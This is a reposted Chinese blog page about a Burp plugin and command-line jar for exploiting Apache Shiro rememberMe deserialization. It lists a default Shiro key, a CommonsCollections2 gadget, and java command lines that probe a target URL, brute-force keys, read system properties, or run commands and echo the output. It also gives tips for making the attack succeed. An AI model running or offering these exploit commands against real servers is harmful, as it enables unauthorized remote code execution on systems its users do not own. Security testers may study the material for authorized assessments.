碼上快樂

相關內容    簡體    繁體

Shiro 回顯利用工具(burp

本文轉載自   查看原文   2020-07-26 17:16   3233    雜項

mvn package 編譯

歡迎關注 寬字節安全 公眾號

changelog

  1. 新增shiro 檢測方式(對,就是那個不需要gadget的檢測方式) 2020.7.30
  2. 新增shiro 100 key
  3. 支持自定義key
  4. 支持作為插件導入burp

burp插件使用方法

repeater界面中右鍵,生成payload

默認kph密鑰,cc2利用鏈,獲取信息,如果需要修改,請右鍵選擇config

生成后,會自動替換request內容,並攻擊

當然,這個jar包也可以直接在命令行下運行,生成rememberMe,或者檢測,一切不變

自定義key檢測

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==

內置100key檢測

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp

檢測方式

運行

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc

檢測

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/

shiro-urldns 檢測&利用工具

支持shiro 16個key,支持攻擊利用。支持的key與gadget以及攻擊類型如下

查看目標服務器的系統信息

該攻擊類型為XraySysProp,使用方法如下

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp

利用截圖如下

執行命令並回顯

該攻擊類型為XrayCmd 使用方法如下

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd

利用截圖如下

注意事項

  1. 建議刪除不相關的http請求頭,不然會因為http請求頭過大而提示400錯誤
  2. 建議使用CommonsCollections2 gadget,體積小,利用率高


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 編寫一款Shiro反序列化回顯利用工具(GUI) 命令執行沒有回顯利用 利用DNSLog實現無回顯注入 gitlab private-token利用工具 jetty bleed漏洞利用工具 JBOSS /invoker/JMXInvokerServlet 利用工具 jenkins遠程命令執行利用工具 3.CTF——python利用工具 hyscan 基於內網信息搜集/利用工具 php命令執行無回顯判斷及利用方法
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM